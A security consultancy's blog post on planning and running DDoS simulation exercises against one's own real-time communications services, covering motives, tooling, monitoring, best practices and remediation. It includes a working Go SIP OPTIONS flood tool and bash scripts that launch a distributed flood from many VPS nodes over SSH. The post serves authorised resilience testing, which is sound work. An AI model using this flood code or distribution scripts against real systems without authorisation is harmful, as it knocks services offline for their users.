TL;DR
A DDoS simulation is a practical exercise that various organisations are capable of doing. Understand the reasons why you would want to do this, then combine custom with off-the-shelf attack tools. Follow the best practices, apply solutions and mitigation; and you can finally answer: what if we got attacked?
Introduction
In this post, we give an overview of how you too can perform your own distributed denial of service (DDoS) simulation exercises. We focus on attacking real-time communications systems because this is an area where DoS attacks can really cause damage. But the instructions and ideas outlined in this text will apply to any system in general that you might need to test. Even if in this article we do not really focus on the defensive side of protecting against DoS, ultimately the goal is to design and implement solutions that actually work for the systems and applications that need to be protected.
If you would rather watch a presentation or go through the slides, we gave a talk on this very topic at TADSummit 2023 in Portugal. The video can be watched on Youtube, and the slides are also available here.
Why would you want to attack your own services?
The answer surely has to be that this is a great way to have some dangerous fun! It is indeed an entertaining thing to do and can lead to some interesting and often unexpected results.
Seriously though, the real reason tends to be that of finding out how your critical services are going to react during a DDoS attack. The exercise that we are about to describe might be an important part of the answer to the question: what if we got attacked? The aim is to create a system that can, within reasonable effort, withstand most attacks that might be launched against your business.
If no security protection is in place for DoS, then you might want to see how dangerous this is for your particular business. How bad does it get? A DDoS simulation exercise will give you an answer.
In many cases where service availability is critical, organisations will have some form of protection mechanism. Either that, or they will rely on technologies that are able to withstand such attacks. It is often a matter of a hybrid approach with some things being better protected than others. In such cases, you will want to do such an exercise to find out which protection mechanisms actually work. Protection mechanisms are often in place but rarely ever properly tested. Until you test, you should really not make any assumptions as to their robustness. What often happens, unfortunately, is that service providers find out about their weaknesses during an actual attack. This is far from ideal - you can certainly do better by simulating such attacks.
Another very good reason is to evaluate a security solution that claims to protect against DDoS attacks. How well does it work? Perhaps you are comparing two or more solutions - which one works better in your situation? A DDoS simulation will provide some important answers there.
Finally, almost all DoS protection mechanisms fail at some point. Perhaps the security solution looks for particular patterns, but the attacks can be modified slightly leading to a bypass. Or network traffic bursts are not handled well by the security mechanisms in place. Or the attack can be slow enough to bypass protection mechanisms that rely on blocking high packet rates. Every organisation has limitations - bandwidth, system resources, application efficiency and bugs. The point is to understand if your current protection level is sufficient against the current state of affairs. And also - to understand how well your people can handle such an attack. What sort of incident response capabilities do you have?
A threat modelling approach can help here. You need to identify:
- what are your most critical services?
- are they exposed to DDoS attacks?
- what do we need to do to protect against these attacks?
Preparing for destruction
Once you have convinced yourself as to why you should simulate a DDoS attack, it is time to start making preparations for such a test.
Firstly, one has to decide what to attack and what sort of attacks to simulate. For example, you are likely to have to choose between or combine the following:
- bandwidth saturation
- protocol specific attacks
- application attacks
If you are attacking specific applications you will want to do some initial tests to explore which parts of that application should be attacked. In general, you may want to look for:
- errors, especially if generated during fuzzing
- slow responses
- increase in memory consumption (even if it is a slight increase)
For example, if your target is an API or even a SIP server, you are very likely to simply flood the target with POST or REGISTER messages. But if you are testing a specific application, you will want to make sure that the targeted functionality is being reached. With an API target, it might be that you are testing an API call which triggers a callback. You will want to have the full workflow fully functional and set up a callback handler. In the case of a SIP server, perhaps there is a voicemail application - you will want to call a specific number, and often will need to authenticate that call.
Next thing you’ll need is some attack tools. If your aim is to see how bandwidth saturation affects you, or to do generic protocol attacks, then standard or simple tools are often enough. What is important is that the attack tools are more efficient than the target application. Often such applications simply generate traffic, perhaps replaying messages. Two useful features to look for in terms of attack tools are:
- rate limiting
- concurrency (especially for handling multiple sockets or connections)
It is also nice to have the ability to distribute the source IP for systems that have more than one IP assigned to them. And it is great when tools offer flexibility, through the combination of different techniques. For example, a tool can offer the option of closing the connection on sending (or receiving) each message versus keeping the connection open. Such a tool may also have the ability to use various different SIP or HTTP methods.
The following is an example of such a tool, written in Go that floods a SIP target with OPTIONS messages:
package main
import (
"log"
"net"
)
func flood() {
payload := "OPTIONS sip:demo.sipvicious.pro SIP/2.0\r\n" +
"Content-Length: 0\r\n\r\n"
b := make([]byte, 1024)
for {
c, err := net.Dial("udp", "demo.sipvicious.pro:5060")
if err != nil { log.Fatal(err) }
// Read loop
go func() {
for { c.Read(b) }
}()
// Write loop
go func() {
for { c.Write([]byte(payload)) }
}()
}
}
func main() {
flood()
}
The same code can be changed to run the same attack using 100 concurrent goroutines:
package main
// ...
func flood() {
payload := "OPTIONS sip:demo.sipvicious.pro SIP/2.0\r\n" +
"Content-Length: 0\r\n\r\n"
// ...
}
func main() {
for i:=0;i<100;i++ { go flood() }
select{}
}
The attack tool is not the only thing you need. You will also need control tools to do the following:
- distribute the attack tools
- start the attack
- stop the attack
One may use something like Terraform to distribute the attack tools. Then there is the starting and stopping the attack tools, which can naturally be done using SSH. Although this is not the best option, it is a good start. One thing to keep in mind is that the ability to stop the attack should be failsafe. If the attack machine is no longer reachable by the person doing the tests, this might lead to real downtime for the target and lead to an actual real incident! So it is important to have a killswitch or backup method so that the attack can always be turned off.
Here’s an example of how one can start an attack tool using a VPS API and SSH:
#!/bin/bash
for ip in `vps-cli vps list --format ipv4 --json | jq -r '[.[][][]] | join(" ")'`;
do
ssh root@${ip} sipvicious sip dos flood udp://demo.sipvicious.pro:5060 &
done
Similarly, the attack tools can be stopped as follows:
#!/bin/bash
for ip in `vps-cli vps list --format ipv4 --json | jq -r '[.[][][]] | join(" ")'`;
do
ssh root@${ip} killall sipvicious &
done
Then there is the actual kill-switch:
#!/bin/bash
for id in `vps-cli vps list --format id --json | jq -r '[.[][]] | join(" ")'`;
do
vps-cli vps shutdown ${id}
done
Finally, you will need attack nodes. These are the systems from which to launch your distributed attacks.
Word of caution: if you are using third-parties, you will want to make sure that this activity is allowed and that other customers are not going to be impacted. This is especially a concern in the case of bandwidth saturation.
Here are some options:
- VPS - which you might choose due to ease of getting started and distributing the attacks over a large number of nodes for a relatively low price
- VMs - which can be useful for internal tests done in a lab environment
- Bare metal servers - which are great for attacks that consume bandwidth or require decent resources, but are naturally more expensive
Once you have these different components in place, you will want to prepare your monitoring systems. It is important to monitor your bandwidth usage. Sometimes when attacking a particular protocol or application, even if the purpose is not to saturate bandwidth, the result is that the bandwidth is saturated. We even wrote a blog post about this here: Why volumetric DDoS cripples VoIP providers and what we see during pentesting.
Therefore, monitor your bandwidth at the target level and at the attack node level too.
If you are targeting a particular application, you will want to monitor the application itself and the underlying system resources. Profiling can be a useful tool when debugging specific issues. That is, having the ability to switch profiling on during such a test can be really beneficial.
One thing that we should not forget is the people. These are the engineers and members of staff who need to be involved and monitor the target system. These might be members of various different teams that would need to be involved. If you are going to do your tests on a live system, you will want to do such tests during off-peak hours. Therefore, the right people need to be booked and advised well ahead of time.
And finally, the test environment. You will need a place to test and if you’re doing this on a non-production environment, it is important that it is as similar to production as possible.
One more thing - you need a plan.
You will need to figure out each particular test to be done, ahead of time. Each step in the plan could increase in complexity. This allows you to start with the easier tests that might show problems that need to be resolved before more complex tests are done.
Running the tests
What do you need to do during the actual tests?
You will need to start monitoring. Specifically monitor the following:
- bandwidth
- application
- system resources
- dependencies such as databases
The target system should be monitored through a pinger which is a tool that simulates legitimate traffic periodically (e.g. every second). Although this usually indicates major problems, it might miss more subtle issues.
The following is a demo showing our own attack platform that we use to do such tests:
So when things break, you should get notified through monitoring. At this point you should stop and assess. In fact, the real work during this exercise starts here. This can take a while and some of it might be done later in a more targeted retest but it is important to try to understand the root cause.
Finally, you should start creating some documentation and reports.
Best practices for running DDoS simulations
Which brings us to the best practices part. Here are 6 best practices that to post on your wall if you decide to go through with a DDoS simulation:
- Try to automate as much as possible. For example, capturing of the monitoring results (from the pinger) and bandwidth statistics could be automated
- Have a real-time communication channel with the engineers (we often use Google Meet)
- Work with the engineers not against them - collaborate, don’t compete
- Test your tests ahead of time! i.e. do your own QA
- Start documenting the results (which can be semi-automated); otherwise you might forget what actually happened
- Set a fixed scope and fixed timeframe - know your limits (we stick to up to 2hrs, which is already quite tiring)
What happens after the fact?
You probably end up with a number of findings. What happens next?
It really depends on your findings, but generally one should perform root cause analysis. This might have started during the actual exercise but should probably be continued and allocated proper time. This involves debugging applications, reviewing logs and so on.
Once the root cause of each finding is determined, solutions or mitigation techniques should be discussed. We have seen many engineers just jumping to solutions without proper assessment. The thing is that solutions need to be practical. They also should not introduce new problems that might prevent legitimate users from accessing the systems and also actually address the problems that were identified.
Then, the solutions or mitigation techniques can be implemented. Here are some examples that we have seen:
- an outdated logging library was leading to locks, updating would have solved it (but dependency hell!)
- changes in application configuration that can work wonders
- rate limiting solutions
- application code changes (often done as a result of profiling)
One caveat to keep in mind is that real solutions rarely consist of buying more resources.
Finally, you will want to update your documentation to include details about your solutions. And then, you should test the solution again and find out if it works and where it might fail. This is where you create a feedback loop and keep improving your system.
Moving forward towards more robust systems
By doing your own DDoS simulations, you actually learn a great deal about your system. You no longer need to guess if you will handle a real attack when it does happen. Just because you have a security solution in place, it does not mean that it will necessarily withstand adversity.
There is one more thing. Because no security solution is perfect, don’t forget that incident response, disaster recovery and similar areas are very important. Security is (unfortunately) often a cat and mouse game, and there is always more that can be covered and more that can be tested. The question that you’ll want to answer is “how will we handle it?”. A DDoS simulation can in fact help you get to that answer.
Rather have us do all the work?
At Enable Security, we offer DDoS simulation as a service. We also help our clients do their own tests through our consultancy service. However, this usually only makes sense as a collaborative exercise since feedback from the stakeholders is critical when doing such a test. If you would like to learn more do get in touch through our contact page.